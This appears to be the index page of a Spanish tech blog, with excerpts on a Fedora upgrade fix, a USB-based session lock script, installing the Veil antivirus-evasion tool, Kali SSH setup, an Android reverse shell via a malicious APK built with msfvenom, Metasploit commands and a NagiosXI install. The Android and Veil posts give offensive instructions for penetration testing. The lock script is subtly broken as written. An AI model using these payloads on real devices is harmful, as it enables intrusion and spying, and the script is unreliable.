Problemas con Evolution mail client después de Fedora 28 upgrade

El otro día hice el upgrade de la version 27 de Fedora a la 28 y nada más terminar, al abrir mi cliente de correo Evolution… ZAS! Fallo con la encriptación TLS…. el correo no funciona lo cual me alegra porque no recibiré más correos 🙂 pero por desgracia lo tengo que arreglar.

Bueno, el problema es que en la nueva versión y, como debe ser… Se ha eliminado el soporte legacy a encriptaciones deprecadas o débiles, por lo que si trabajáis con servidores de correo muy antiguos debéis habilitar el legacy encryption con el siguiente comando:

/usr/bin/update-crypto-policies –set LEGACY

Por supuesto, este comando lo tenéis que ejecutar como root o… con uno que tenga privilegios suficientes.

Token de autenticación para linux

El otro día un compi de curro me pasó el siguiente código para auto bloquear/desbloquear la sesión de linux, dependiendo si está conectado un dispositivo con un UUID concreto. Si está presente, la sesión se desbloquea y si lo desconectamos desaparece. el código es el siguiente:


#!/bin/bash

while true
do

#loginctl lock-session
#Test if drive is inserted
test=/usr/sbin/blkid|grep -q "1dcaa605-cb4c-4853-8fa7-f60h432749b0";echo $?
if [ "$test" = "0" ]
then
loginctl unlock-session
else
loginctl lock-session
fi

sleep 2

De esta manera, y usnado esta idea podemos usar como 2FA nuestro móvil, USB… lo que queramos. Recordad sustituir el UUID (1dcaa605-cb4c-4853-8fa7-f60h432749b0)  por el vuestro, no seais muñones 🙂

Evasión de antivirus con Veil – Instalación (II)

En anteriores posts vimos como instalar Veil-Evasion desde consola usando apt. Podéis repasar el post pulsando aquí.

Pero usando apt no es la única manera de instalarlo por lo que, a continuación os pongo otra manera de tener Veil instalado en Kali.

En una consola de comandos, ejecutamos el siguiente comando:

mkdir GitDownloads

cd GitDownloadscs

git clone https://github.com/Veil-Framework/Veil-Evasion.git

veilgit

Cuando haya terminado tendremos dentro de GitDowloads veremos que tenemos el directorio Veil-Evasion, en setup, así que nos metemos en él y ejecutamos lo siguiente:

cd /root/GitDownloads/Veil-Evasion/setup

./setup

Continue Reading

Evasión de antivirus con Veil – Instalación (I)

A la hora de hacer nuestro Penetration Test debemos tener en cuenta los Antivirus. El antivirus es otra de las capas de seguridad que la mayoría de los PCs/Servidores tienen instalados y que pueden fastidiarnos el ataque por detectar nuestro payload.

Para evitar esta circunstancia tenemos la herramienta Veil. Por defecto no está instalada en nuestra distribución de Kali, por lo que tendremos que proceder a hacer instalación manual.

sudo apt-get update

sudo apt-get install veil-evasion

veil

Una vez terminado ejecutamos el comando:

veil-evasion

El cual nos preguntará si queremos continuar con la instalación. Pulsaremos “y”

veilinst

Durante el proceso de instalción nos va a instalar todas las dependencias como python, ruby y wine. Os irán apareciendo ventanas de instalación de tipo windows así que dadle todo a siguiente.

Con esto concluye la instalación de veil. Para iniciarlo basta con ejecutar:

veil-evasion

Configurar SSH en Kali

Vamos a explicar como acceder a nuestro Kali mediante SSH para poder trabajar con él sin necesidad de estar físicamente delante del PC/Server.

  1. Instalar openSSH server
  2. Habilitar el servicio SSH en el inico
  3. Cambiar las claves por defecto de SSH para evitar ataques de MITM
  4. Cambiar el puerto por defecto de SSH para aumentar así la seguridad.
  5. Modificat el MOTD (opcional)

Para ello, primeramente vamos a utilizar un comando muy útil que nos mostrará la lista de servicios de kali así como su estado.

service –status-all

Continue Reading

Android Hack (I) – Reverse shell con msfvenom

En este post vamos a lanzar un ataque sobre dispositivos android. El objetivo es conseguir una shell remota con la que hacernos con el control. Una vez conseguido, podremos listar, copiar, modificar el contenido del teléfono, comprobar las llamadas, ver por las cámaras, grabar sonido…

Para conseguirlo necesitamos:

Kali
Metasploit
Msfvenom
Ingeniería social
Dispositivo android como víctima

Lo primero que vamos a hacer es crear la apk maliciosa con el payload embebido. En este caso vamos a usar como payload android/meterpreter/reverse_tcp.

Abrimos una shell en Kali y ejecutamos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp lhost=[IP de la máquina kali] lport=[puerto (por defecto es 4444)] r > [nombre de la app.apk]
msfvenom -p android/meterpreter/reverse_tcp lhost=10.100.100.30 lport=4444 r > bad.apk

Ya tenemos creada la APK. Por defecto se genera en el directorio en el cual estamos situados cuando lanzamos el comando.

[KGVID]http://melin360.com/wp-content/uploads/2016/09/msfvenom2.webm[/KGVID]

A continuación tenemos que seleccionar el exploit y ponerlo a escuchar en el puerto que definimos en el comando anterior (4444).

Abrimos metasploit ejecutando en una shell el comando msfconsole. Ejecutamos los siguientes comandos:
Continue Reading

Metasploit (I): Comandos

info: Muestra información de un módulo que previamente se ha seleccionado, o por el contrario del módulo si le pasamos una ruta.
Exploit: lanza el código malicioso sobre el objetivo. tiene variso parámetros:
-j, lanza el exploit en segundo plano
-z, no interactúa con la sesión tras la explotación
-e, se lanza el payload con la codificación mediando un encoder previamente.
check: Permite comprobar si el sistema es vulnerable o no antes de lanzar el script.
show exploits: muestra la lista de exploits que hay disponible con el SO, o servicio que afectan.
show payloads: lista los payloads
use [nombre exploit]: es para seleccionar un exploit específico.
show options: dentro del exploit, muestra los requisitos del exploit. Es igual que info pero se usa una vez se ha seleccionado el exploit con el comando use.

 

Continue Reading

NagiosXI – Instalación

En esta guía vamos a instalar desde las fuentes (source installer) en un CentOS 6.6.

Lo primero es descargar de la web las fuentes (versión 2014R2.6).

http://library.nagios.com/library/products/nagiosxi/downloads/main

Una vez descargado, descomprimimos el archivo.

tar -zxf xi-2-14r2.6.tar.gz

Nos creará la carpeta nagiosxi. Dentro de esa carpteta ejecutamos el script:

./fullinstall

Nos descargará e instalará todas las dependencias. Esto tardará unos minutos dependiendo de los recursos de nuestra máquina.

Cuando terminemos en un navegador introducimos la IP y nos cargará un asitente para configurar la instancia.

NagiosXI